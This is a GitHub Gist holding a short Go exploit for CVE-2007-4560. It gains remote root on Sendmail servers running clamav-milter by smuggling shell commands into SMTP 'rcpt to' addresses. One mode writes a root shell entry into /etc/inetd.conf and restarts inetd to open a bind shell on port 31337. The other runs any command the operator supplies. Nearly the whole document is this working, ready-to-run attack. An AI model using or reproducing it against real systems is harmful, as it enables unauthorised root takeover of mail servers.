Last active
March 10, 2021 20:09
-
-
Save 0xjbb/fdf1678addf0c957bf2b284b29e4dff4 to your computer and use it in GitHub Desktop.
[GO] ClamAV Milter Remote Code Execution [CVE-2007-4560]
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| // Sendmail w/ clamav-milter Remote Root Exploit | |
| // 'CVE-2007-4560' | |
| // coded by https://github.com/0xjbb :) | |
| // go run exploit.go -h 192.168.109.42 -p 25 -c "ping -c 5 192.168.49.109" | |
| import ( | |
| "flag" | |
| "log" | |
| "net" | |
| ) | |
| func main(){ | |
| ip := flag.String("h", "", "Ip Address") | |
| port := flag.String("p", "25", "Port") | |
| bind := flag.Bool("b", false, "Spawn bind shell on target") | |
| cmd := flag.String("c", "", "Use Command instead of bind shell") | |
| flag.Parse() | |
| conn, err := net.Dial("tcp", *ip + ":" + *port) | |
| if err != nil{ | |
| log.Fatal("Connection error: ", err) | |
| } | |
| conn.Write([]byte("helo you\r\n")) | |
| conn.Write([]byte("mail from: <>\r\n")) | |
| if *bind { | |
| conn.Write([]byte("rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n")) | |
| conn.Write([]byte("rcpt to: <nobody+\"|/etc/init.d/inetd restart\"@localhost>\r\n")) | |
| }else{ | |
| conn.Write([]byte("rcpt to: <nobody+\"|" + *cmd +"\"@localhost>\r\n")) | |
| } | |
| conn.Write([]byte("data\r\n.\r\nquit\r\n")) | |
| } | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment